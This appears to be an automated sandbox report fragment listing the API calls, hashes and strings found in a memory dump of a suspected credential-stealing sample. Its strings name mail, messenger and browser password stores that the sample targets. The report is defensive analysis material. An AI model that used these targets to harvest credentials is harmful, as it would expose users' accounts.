                    • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                    • String ID:
                    • API String ID: 3974772901-0
                    • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                    • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                    APIs
                    • wcslen.MSVCRT ref: 0044406C
                    • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                    • strlen.MSVCRT ref: 004440D1
                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                    • memcpy.MSVCRT ref: 004440EB
                    • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                    • String ID:
                    • API String ID: 577244452-0
                    • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                    • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                    APIs
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    • _strcmpi.MSVCRT ref: 00404518
                    • _strcmpi.MSVCRT ref: 00404536
                    Strings
                    Similarity
                    • API ID: _strcmpi$memcpystrlen
                    • String ID: imap$pop3$smtp
                    APIs
                    • memset.MSVCRT ref: 0040C02D
                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                      • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                      • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                      • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                      • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                    Strings
                    Similarity
                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                    APIs
                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                    • OpenClipboard.USER32(?), ref: 0040C1B1
                    • GetLastError.KERNEL32 ref: 0040C1CA
                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                    Similarity
                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                    • String ID:
                    APIs
                    • memcmp.MSVCRT ref: 00406151
                      • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                      • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                      • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                    • memcmp.MSVCRT ref: 0040617C
                    • memcmp.MSVCRT ref: 004061A4
                    • memcpy.MSVCRT ref: 004061C1
                    Strings
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID: global-salt$password-check
                    APIs
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    APIs
                    • GetClientRect.USER32(?,?), ref: 004016A3
                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                    • BeginPaint.USER32(?,?), ref: 004016D7
                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                    • EndPaint.USER32(?,?), ref: 004016F3
                    Similarity
                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                    • String ID:
                    APIs
                    • memset.MSVCRT ref: 0040644F
                    • memcpy.MSVCRT ref: 00406462
                    • memcpy.MSVCRT ref: 00406475
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                      • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                      • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                    • memcpy.MSVCRT ref: 004064B9
                    • memcpy.MSVCRT ref: 004064CC
                    • memcpy.MSVCRT ref: 004064F9
                    • memcpy.MSVCRT ref: 0040650E
                      • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    APIs
                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                    • memset.MSVCRT ref: 0040330B
                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                    • strchr.MSVCRT ref: 0040335A
                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                    • strlen.MSVCRT ref: 0040339C
                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                    Strings
                    Similarity
                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                    • String ID: Personalities
                    APIs
                    • memset.MSVCRT ref: 00444573
                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                    Strings
                    Similarity
                    • API ID: CloseOpenQueryValuememset
                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                    APIs
                    Strings
                    Similarity
                    • API ID: memset
                    • String ID: H
                    APIs
                    Strings
                    Similarity
                    • API ID: memcpy
                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                    APIs
                    Strings
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: winWrite1$winWrite2
                    APIs
                    Strings
                    Similarity
                    • API ID: memcpymemset
                    • String ID: winRead
                    APIs
                    Strings
                    Similarity
                    • API ID: memcpymemset
                    • String ID: gj
                    APIs
                    • GetParent.USER32(?), ref: 004090C2
                    • GetWindowRect.USER32(?,?), ref: 004090CF
                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                    Similarity
                    • API ID: Window$Rect$ClientParentPoints
                    • String ID:
                    APIs
                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                    • GetSysColor.USER32(00000005), ref: 004107A6
                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                    Similarity
                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                    • String ID:
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                    Strings
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: winSeekFile$winTruncate1$winTruncate2
                    APIs
                    Strings
                    Similarity
                    • API ID: _strcmpi$_mbscpy
                    • String ID: smtp
                    APIs
                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    • memset.MSVCRT ref: 00408258
                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                    Strings
                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                    Similarity
                    • API ID: Close$EnumOpenmemset
                    • String ID: Software\Google\Google Desktop\Mailboxes
                    APIs
                    • memset.MSVCRT ref: 0040C28C
                    • SetFocus.USER32(?,?), ref: 0040C314
                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                    Strings
                    Similarity
                    • API ID: FocusMessagePostmemset
                    • String ID: S_@$l
                    APIs
                    • memset.MSVCRT ref: 004092C0
                    • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                    • _mbscpy.MSVCRT ref: 004092FC
                    Strings
                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                    Similarity
                    • API ID: PrivateProfileString_mbscpymemset
                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                    APIs
                    Strings
                    Similarity
                    • API ID: _mbscpy
                    • String ID: C^@$X$ini
                    APIs
                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                    Strings
                    Similarity
                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                    • String ID: MS Sans Serif
                    APIs
                    Strings
                    Similarity
                    • API ID: ClassName_strcmpimemset
                    • String ID: edit
                    APIs
                    Strings
                    Similarity
                    • API ID: strlen$_mbscat
                    • String ID: 3CD
                    APIs
                    Strings
                    Similarity
                    • API ID: memset
                    • String ID: rows deleted
                    APIs
                    Similarity
                    • API ID: ??2@$memset
                    • String ID:
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    APIs
                    • __allrem.LIBCMT ref: 00425850
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                    • __allrem.LIBCMT ref: 00425933
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    Strings
                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                    • too many SQL variables, xrefs: 0042C6FD
                    Similarity
                    • API ID: memset
                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                    APIs
                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                    • memset.MSVCRT ref: 004026AD
                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                      • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                    • LocalFree.KERNEL32(?), ref: 004027A6
                    Similarity
                    • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                    • String ID:
                    APIs
                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                    • strlen.MSVCRT ref: 0040B60B
                    • atoi.MSVCRT ref: 0040B619
                    • _mbsicmp.MSVCRT ref: 0040B66C
                    • _mbsicmp.MSVCRT ref: 0040B67F
                    Similarity
                    • API ID: _mbsicmp$??2@??3@atoistrlen
                    • String ID:
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                    • String ID:
                    Similarity
                    • API ID: strlen
                    • String ID: >$>$>
                    Similarity
                    • API ID: memcpy
                    • String ID: @
                    Similarity
                    • API ID: _strcmpi
                    • String ID: C@$mail.identity
                    APIs
                    • memset.MSVCRT ref: 00406640
                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                      • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                      • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                    • memcmp.MSVCRT ref: 00406672
                    • memcpy.MSVCRT ref: 00406695
                    Similarity
                    • API ID: memcpy$memset$memcmp
                    • String ID: Ul@
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    APIs
                      • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                    Strings
                    • recovered %d pages from %s, xrefs: 004188B4
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                    • String ID: recovered %d pages from %s
                    Similarity
                    • API ID: _ultoasprintf
                    • String ID: %s %s %s
                    APIs
                    • LoadMenuA.USER32(00000000), ref: 00409078
                    • sprintf.MSVCRT ref: 0040909B
                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                    Similarity
                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                    • String ID: menu_%d
                    Strings
                    • failed memory resize %u to %u bytes, xrefs: 00411706
                    Similarity
                    • API ID: _msizerealloc
                    • String ID: failed memory resize %u to %u bytes
                    APIs
                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                    • strrchr.MSVCRT ref: 00409808
                    • _mbscat.MSVCRT ref: 0040981D
                    Similarity
                    • API ID: FileModuleName_mbscatstrrchr
                    • String ID: _lng.ini
                    APIs
                    • _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                    • _mbscat.MSVCRT ref: 004070FA
                    Similarity
                    • API ID: _mbscat$_mbscpystrlen
                    • String ID: sqlite3.dll
                    APIs
                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                    Similarity
                    • API ID: PrivateProfileString
                    • String ID: A4@$Server Details
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    Similarity
                    • API ID: FreeLocalmemcpymemsetstrlen
                    • String ID:
                    Similarity
                    • API ID: memcpy
                    • String ID: